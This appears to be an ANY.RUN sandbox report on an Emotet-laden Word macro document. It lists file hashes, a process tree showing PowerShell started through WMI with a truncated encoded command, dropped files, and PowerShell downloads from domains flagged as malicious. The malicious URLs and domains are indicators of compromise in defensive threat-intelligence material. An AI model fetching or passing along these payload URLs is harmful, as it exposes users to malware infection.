File name: TheG0df2ther@Emotet.doc

Full analysis: https://app.any.run/tasks/21c57cce-bb34-4056-9a44-92927a9655a9
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into very destructive malware. It targets mostly corporate victims, but private users are also infected in mass spam email campaigns.

Analysis date: November 21, 2021, 19:15:04
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5: B92021CA10AED3046FC3BE5AC1C2A094
SHA1: 0FB1AD5B53CDD09A7268C823EC796A6E623F086F
SHA256: C378387344E0A552DC065DE6BFA607FD26E0B5C569751C79FBF9C6F2E91C9807
SSDEEP: 3072:/Msknok2er/yR5DpQKajNDu1CkBwN0pqJfWSq:zkoRoKDpQZqQkmN0scR

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Checks supported languages

      • powershell.exe (PID: 2152)
    • Reads the date of Windows installation

      • powershell.exe (PID: 2152)
    • Executed via WMI

      • powershell.exe (PID: 2152)
    • Reads the computer name

      • powershell.exe (PID: 2152)
    • PowerShell script executed

      • powershell.exe (PID: 2152)
    • Creates files in the user directory

      • powershell.exe (PID: 2152)
    • Reads Environment values

      • powershell.exe (PID: 2152)
    • Executes application which crashes

      • powershell.exe (PID: 2152)
  • INFO

    • Checks supported languages

      • WINWORD.EXE (PID: 3296)
      • ntvdm.exe (PID: 968)
    • Reads the computer name

      • WINWORD.EXE (PID: 3296)
    • Reads mouse settings

      • WINWORD.EXE (PID: 3296)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3296)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3296)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2152)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x247a0b47
ZipCompressedSize: 524
ZipUncompressedSize: 3939
ZipFileName: [Content_Types].xml

XMP

Title: -
Subject: -
Creator: -
Description: -

XML

Keywords: -
LastModifiedBy: -
RevisionNumber: 1
CreateDate: 2019:09:16 12:22:00Z
ModifyDate: 2019:09:16 12:22:00Z
Template: Normal.dotm
TotalEditTime: -
Pages: 1
Words: 66
Characters: 380
Application: Microsoft Office Word
DocSecurity: None
Lines: 3
Paragraphs: 1
ScaleCrop: No
Company: -
LinksUpToDate: No
CharactersWithSpaces: 445
SharedDoc: No
HyperlinksChanged: No
AppVersion: 16
No data.
All screenshots are available in the full report
Total processes: 39
Monitored processes: 3
Malicious processes: 1
Suspicious processes: 0

Behavior graph

Graph nodes: start, winword.exe (no specs), powershell.exe, ntvdm.exe (no specs)

Process information

PID: 968
CMD: "C:\Windows\system32\ntvdm.exe" -i1
Path: C:\Windows\system32\ntvdm.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: NTVDM.EXE
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ntvdm.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
PID: 2152
CMD: powershell -enco …
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\user32.dll
c:\windows\system32\atl.dll
c:\windows\system32\lpk.dll
PID: 3296
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\TheG0df2ther@Emotet.doc.docm"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: Explorer.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Exit code: 0
Version: 14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
Total events: 8 309
Read events: 7 487
Write events: 692
Delete events: 130

Modification events

(PID) Process: (3296) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: write
Name: |&<
Value: 7C263C00E00C0000010000000000000000000000

(PID) Process: (3296) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write (nine separate writes, one per value name)
Name: 1033, 1041, 1046, 1036, 1031, 1040, 1049, 3082, 1042
Value: Off (for each name)
Executable files: 0
Suspicious files: 3
Text files: 40
Unknown types: 3

Dropped files

PID: 3296, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\CVR166D.tmp.cvr
Type: -
MD5: -
SHA256: -

PID: 3296, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\~$eG0df2ther@Emotet.doc.docm
Type: pgc
MD5: -
SHA256: -

PID: 3296, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Type: pgc
MD5: -
SHA256: -

PID: 3296, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\40458E9F.wmf
Type: image
MD5: 47494691A7204F143E5910EF1947C99E
SHA256: CDFB8B2FF4202BC86346915D1EBDE4E45AB67E40E50EE8D0529D4D7FC4EEC759

PID: 3296, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\375E43EC.dat
Type: image
MD5: B968160E32B2FBEBB3FF6C55F5B4885B
SHA256: 7CF4AE188785F7C0E5E4A1D5BDAC0B52BC65D3AA46513022A9E35489765C19C9

PID: 3296, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A229ABAE.dat
Type: image
MD5: 35428803E94ECDFA6A957382868444DA
SHA256: 73B03956B8DD27BFD4F7A828A7654456D6952E4C75AA03CF3F5050EEE366BCAE

PID: 3296, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\93B6FB42.dat
Type: image
MD5: C1F138C3F19B5545D60B3B5D4C2BA4FC
SHA256: 80C4552EC9FED881E1806AA55368D3428832F52157AB8D92E7FB531658961A3E

PID: 3296, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E90DB105.wmf
Type: image
MD5: E6FC21E06D4C1D2DD72A8D2D58BC9582
SHA256: 52FBAD38CD46CBBB7B0F1978BE53A747AEC181DE14CD232B41C101A355AE8385

PID: 3296, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2AA0FCA0.dat
Type: image
MD5: B2B55276284D41BAA290155CB55A94E2
SHA256: C08D5EC45948BDE7FBA129C2BD1A6BF2816015DA7BC0B8BC76DE8F8F3727D2CD

PID: 3296, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F1D90E5B.wmf
Type: image
MD5: 8436C2235EB1BBD97ADF43E95FD02CE8
SHA256: 48F88EC1E3A36BC969EFBDD8E6A12D66EF8CFCF6B247708B018DE21DF2A6615F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 2
TCP/UDP connections: 7
DNS requests: 6
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2152 | powershell.exe | GET | 301 | 173.198.248.218:80 | http://www.deepikarai.com/bangalore-escorts.php | US | html | 256 b | malicious
2152 | powershell.exe | GET | 200 | 208.91.197.27:80 | http://blockchainjoblist.com/wp-admin/014080/ | US | html | 18.0 Kb | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
2152 | powershell.exe | 208.91.197.27:80 | blockchainjoblist.com | Confluence Networks Inc | US | malicious
2152 | powershell.exe | 78.41.204.28:443 | yeuquynhnhai.com | Snel.com B.V. | NL | malicious
2152 | powershell.exe | 173.198.248.218:443 | deepikarai.com | Turnkey Internet Inc. | US | unknown
2152 | powershell.exe | 173.198.248.218:80 | deepikarai.com | Turnkey Internet Inc. | US | unknown

DNS requests

Domain | IP | Reputation
blockchainjoblist.com | 208.91.197.27 | malicious
womenempowermentpakistan.com | - | malicious
atnimanvilla.com | - | malicious
yeuquynhnhai.com | 78.41.204.28 | malicious
deepikarai.com | 173.198.248.218 | suspicious
www.deepikarai.com | 173.198.248.218 | unknown

Threats

No threats detected
No debug info